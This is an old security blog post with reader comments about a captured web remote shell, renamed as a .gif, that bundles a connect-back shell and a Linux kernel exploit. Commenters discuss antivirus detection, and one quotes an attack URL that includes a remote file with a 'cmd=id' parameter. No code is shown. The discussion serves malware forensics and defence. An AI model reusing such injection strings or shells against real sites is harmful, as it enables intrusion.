Yet Another Remote Shell
Here’s another one of the failed attacks on ha.ckers.org. I copied the file in case anyone wants to do forensics on it. It’s located here. The odd part is that it is a .gif file. I’m not sure what filter they were attempting to evade by renaming the file, but it didn’t do much.
Is anyone cataloguing this stuff? Should I continue to post it? If not I’ll save myself the trouble, but I wanted to keep it here for any of the AV guys who visit the site. They may get more out of this stuff than other people.
August 29th, 2006 at 9:54 am
I’ve logged into the previous one you posted (the ircbot) and reported it to an irccop after having fun with the ‘hackers’ by pretending I was one of the infected machines.
So if more popup I wouldn’t mind toying with them.
Although this one seems less intriguing.
August 29th, 2006 at 10:09 am
I’m going to take a look at this shell after i got a few other things sorted, set some local tests going, an then if i find anything interesting then I will post back here
August 29th, 2006 at 10:11 am
Norton Anti-Virus detects it as a virus. So it should be known already
August 29th, 2006 at 10:51 am
Yongge Wang do you think it would be the connect back shell “Data Cha0s Connect Back Shell” and the exploit “Linux kernel do_brk vma overflow exploit” that it carrys inside it that are setting you AV of, s one of the opetions of this shell is to write to disk the connect back shell or the exploit depending on the users choice (my personal though is it will be the exploit thats setting ya AV’s bells to ring but thats just my though) if your willing to do me a test (since in not on a win platform) could you take the connect back shell an the exploit out of the shell then see if you AV goes off?
August 29th, 2006 at 2:17 pm
Yes, you are right. After I delete the words “Cha0s…” and “Linux kernel…”. Norton Anti-Virus will not give any alert
December 26th, 2006 at 4:12 pm
I have 17 malicious files saved into an encrypted 7z file. Whenever somebody or some bot tries to use xss on my website, I get an alert and try to save the file they use. And I usually can, but not all the times. Some of them are extremely well formatted and very-very clever… The biggest is 153 kBytes, and really, really complex and clever… And NOD32 recognizes only 2-3 of them as trojans.
Well, basically I am here because somebody tried to hack my site with the file “http://ha.ckers.org/files/tool25.dat?&cmd=id”….
Anyway, I found these blogs very useful, especially which is about the JS code which tries to run an exe…
Keep going! ….. I mean, keep blogging, and not keep ckracking my tiny and almost unknown site. Okay?
December 26th, 2006 at 4:38 pm
The attack on your site wasn’t from ha.ckers.org it did however involve trying to use the tools25.dat file that is hosted here (which has been temporarily moved).